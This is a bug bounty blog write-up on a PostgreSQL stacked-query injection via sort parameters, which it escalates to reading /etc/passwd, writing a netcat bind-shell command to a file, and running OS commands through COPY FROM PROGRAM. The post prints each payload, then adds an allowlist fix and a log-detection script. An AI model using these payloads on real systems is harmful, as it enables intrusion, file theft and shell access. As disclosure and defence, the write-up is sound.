Hello, this is me!

Abdul Wahab

Security Engineer, Bug Bounty Hunter, Synack Red Team Member

Monday, 10 May 2021

PostgreSQL Injection to Remote Code Execution

Aslam-O-Alaikum fellas! In this noobish article, I will post about my recent finding, a PostgreSQL injection that allowed an attacker to access the database and, furthermore, to read/write internal files too.


PostgreSQL, also known as Postgres, is a free and open-source relational database management system emphasizing extensibility and SQL compliance. It was originally named POSTGRES, referring to its origins as a successor to the Ingres database developed at the University of California, Berkeley.

So, the program is a private program and I cannot disclose its name, hence let's call it "private.com". The application "private.com" fetches some sort of datasets from the database using a GET request, which looks like this:

https://private.com/private/datasets/?context_details=%7B%22company%22:%22Context+1%22,%22brand%22:%22Brand+1%22%7D&sort_on=last_modified_date&sort_order=DESC&page_number=1&page_size=10&search_text=%22%22




Now, in the above URL, the 'sort_on' and 'sort_order' parameters work as follows:

SELECT * FROM prod.dataset WHERE (isactive is true) AND context_id = 'private' ORDER BY dataset.last_modified_date DESC LIMIT 20 OFFSET 0
In the above SQL query, the values from the 'sort_on' and 'sort_order' parameters are inserted without validating the user input. Hence, an attacker can break out of the original SQL query and append his own query (a stacked query).

Like this,

https://private.com/private/datasets/?context_details=%7B%22company%22:%22Context+1%22,%22brand%22:%22Brand+1%22%7D&sort_on=last_modified_date&sort_order=DESC%3bSELECT+version()--%26&page_number=1&page_size=10&search_text=%22%22

The above URL inserts our payload ";SELECT version()--&" into the SQL query like this:

SELECT * FROM prod.dataset WHERE (isactive is true) AND context_id = 'private' ORDER BY dataset.last_modified_date DESC;SELECT version()--& LIMIT 20 OFFSET 0

and KaBOOM!
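The root cause above is that ORDER BY identifiers cannot be bound as query parameters, so the backend pasted the raw 'sort_on' and 'sort_order' values into the SQL text. The following added example (my own code, not the private.com application's) reconstructs that flawed pattern beside an allowlist-based builder, and feeds both URLs from this post through the same URL decoding the backend would do. The extra sortable column names are assumed; only 'last_modified_date' appears in the post.

```python
from urllib.parse import parse_qs, urlsplit

# The two requests from the post: the normal one and the stacked-query one.
BENIGN_URL = ("https://private.com/private/datasets/?context_details=%7B%22company%22:%22Context+1%22,"
              "%22brand%22:%22Brand+1%22%7D&sort_on=last_modified_date&sort_order=DESC"
              "&page_number=1&page_size=10&search_text=%22%22")
INJECTED_URL = ("https://private.com/private/datasets/?context_details=%7B%22company%22:%22Context+1%22,"
                "%22brand%22:%22Brand+1%22%7D&sort_on=last_modified_date"
                "&sort_order=DESC%3bSELECT+version()--%26&page_number=1&page_size=10&search_text=%22%22")

# ORDER BY identifiers cannot be bound as query parameters, so the fix is an
# allowlist: user input only selects among fixed, known-good values.
# Only 'last_modified_date' is taken from the post; the other columns are assumed.
SORTABLE_COLUMNS = {"last_modified_date", "name", "created_date"}
SORT_ORDERS = {"ASC", "DESC"}

BASE_QUERY = ("SELECT * FROM prod.dataset WHERE (isactive is true) "
              "AND context_id = 'private' ORDER BY dataset.{col} {order} LIMIT 20 OFFSET 0")


def sort_params_from_url(url: str):
    """Extract (sort_on, sort_order) the way the backend would see them (URL-decoded)."""
    qs = parse_qs(urlsplit(url).query)
    return qs.get("sort_on", [""])[0], qs.get("sort_order", [""])[0]


def build_query_vulnerable(sort_on: str, sort_order: str) -> str:
    """Reconstruction of the flawed pattern: raw input concatenated into the SQL text."""
    return BASE_QUERY.format(col=sort_on, order=sort_order)


def build_query_safe(sort_on: str, sort_order: str) -> str:
    """Allowlist both values; anything else is rejected before any SQL is built."""
    if sort_on not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_on!r}")
    order = sort_order.strip().upper()
    if order not in SORT_ORDERS:
        raise ValueError(f"unsupported sort order: {sort_order!r}")
    return BASE_QUERY.format(col=sort_on, order=order)


def is_injection_blocked(url: str) -> bool:
    """True when the safe builder refuses the request's sort parameters."""
    try:
        build_query_safe(*sort_params_from_url(url))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    col, order = sort_params_from_url(INJECTED_URL)
    print("decoded sort_order:", repr(order))
    print("vulnerable query:", build_query_vulnerable(col, order))
    print("safe builder blocks injected request:", is_injection_blocked(INJECTED_URL))
    print("safe builder allows benign request:", not is_injection_blocked(BENIGN_URL))
```

Running it prints the exact query shown above for the vulnerable builder (the decoded sort_order is `DESC;SELECT version()--&`), while the safe builder raises before any SQL reaches the database. Rejecting unknown values outright, rather than trying to strip semicolons or comment markers, is the design choice that matters: there is no list of bad characters to keep up to date.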



Now, to fetch all the databases, the payload below can be used:

;SELECT datname FROM pg_database--&



Remote Code Execution with PostgreSQL Injection

The following payload is used to confirm whether we are superuser or not, and luckily I got Superuser = True :)

;SELECT user;SHOW is_superuser; SELECT current_setting('is_superuser');SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;--&


Now, we can simply read internal files like this:

;SELECT pg_read_file('/etc/passwd');--&


To write a file, the following query can be used:

;CREATE TABLE hw (t TEXT); INSERT INTO hw(t) VALUES('nc -lvvp 2346 -e /bin/bash'); SELECT * FROM hw; COPY hw(t) TO '/tmp/hw';

According to the Program rules, I am not allowed to make any changes to the server.

The queries below can be used to perform Remote Code Execution.
DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Drop the table you want to use if it already exists
CREATE TABLE cmd_exec(cmd_output text); -- Create the table you want to hold the command output
COPY cmd_exec FROM PROGRAM 'id';        -- Run the system command via the COPY FROM PROGRAM function
SELECT * FROM cmd_exec;                 -- [Optional] View the results
DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Remove the table
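Everything in this section only works because the application's database role was a superuser, so the defensive question is how to notice these statements when they do arrive. The following added example (my own detection code, not part of the original post) runs a small rule set over constructed PostgreSQL server log lines as produced with log_statement = 'all'; the log_line_prefix is made up, and only the text after "statement:" is inspected. It flags the file-read, COPY FROM PROGRAM and privilege-probe statements used above, plus a few well-known siblings (pg_ls_dir, lo_import/lo_export, COPY TO a file), and separately detects stacked statements by counting top-level semicolons outside string literals.

```python
import re

# Constructed sample of PostgreSQL server log lines (log_statement = 'all');
# the prefix format is made up, only the text after "statement:" is inspected.
SAMPLE_LOG = [
    "2021-05-10 12:00:01 UTC [4242] app@prod LOG:  statement: SELECT * FROM prod.dataset WHERE (isactive is true) AND context_id = 'private' ORDER BY dataset.last_modified_date DESC LIMIT 20 OFFSET 0",
    "2021-05-10 12:00:02 UTC [4242] app@prod LOG:  statement: SELECT * FROM prod.dataset WHERE (isactive is true) AND context_id = 'private' ORDER BY dataset.last_modified_date DESC;SELECT version()--& LIMIT 20 OFFSET 0",
    "2021-05-10 12:00:03 UTC [4242] app@prod LOG:  statement: SELECT pg_read_file('/etc/passwd');",
    "2021-05-10 12:00:04 UTC [4242] app@prod LOG:  statement: COPY cmd_exec FROM PROGRAM 'id'",
    "2021-05-10 12:00:05 UTC [4242] app@prod LOG:  statement: INSERT INTO prod.dataset(name) VALUES ('a;b')",
    "2021-05-10 12:00:06 UTC [4242] app@prod LOG:  statement: SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER",
]

# Server-side file/OS primitives used in the post plus a few well-known siblings.
RULES = [
    ("file_read", re.compile(r"\bpg_read_(?:binary_)?file\s*\(", re.I)),
    ("dir_listing", re.compile(r"\bpg_ls_dir\s*\(", re.I)),
    ("program_exec", re.compile(r"\bCOPY\b[^;]*\b(?:FROM|TO)\s+PROGRAM\b", re.I)),
    ("file_write", re.compile(r"\bCOPY\b[^;]*\bTO\s+'", re.I)),
    ("large_object_io", re.compile(r"\blo_(?:import|export)\s*\(", re.I)),
    ("privilege_probe", re.compile(r"\b(?:is_superuser|usesuper)\b", re.I)),
]

STATEMENT_RE = re.compile(r"statement:\s*(.*)$")


def count_statements(sql: str) -> int:
    """Count top-level statements, ignoring ';' inside single-quoted strings.
    A doubled '' inside a literal toggles the flag twice, so it is handled;
    ';' inside a -- comment is not special-cased, which can only over-report."""
    count, in_string, has_text = 0, False, False
    for ch in sql:
        if ch == "'":
            in_string = not in_string
        elif ch == ";" and not in_string:
            count += 1 if has_text else 0
            has_text = False
            continue
        if not ch.isspace():
            has_text = True
    return count + (1 if has_text else 0)


def scan_statement(sql: str):
    """Return the rule names that fire on one logged statement."""
    hits = [name for name, rx in RULES if rx.search(sql)]
    if count_statements(sql) > 1:
        hits.append("stacked_statements")
    return hits


def scan_log(lines):
    """Return (line_number, rule, statement_prefix) for every suspicious logged statement."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = STATEMENT_RE.search(line)
        if not m:
            continue
        sql = m.group(1)
        for rule in scan_statement(sql):
            findings.append((lineno, rule, sql[:60]))
    return findings


if __name__ == "__main__":
    for lineno, rule, snippet in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {rule:<20} {snippet}")
```

Lines 1 and 5 of the sample produce no findings (the semicolon in line 5 sits inside a string literal), while lines 2, 3, 4 and 6 are reported as stacked_statements, file_read, program_exec and privilege_probe respectively. Detection is the second line of defence; the structural fix is to connect the application with a role that is NOSUPERUSER and holds none of the pg_read_server_files, pg_write_server_files or pg_execute_server_program roles (available since PostgreSQL 11), so that pg_read_file and COPY FROM PROGRAM fail with a permission error even if an injection slips through.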


Thanks for reading.
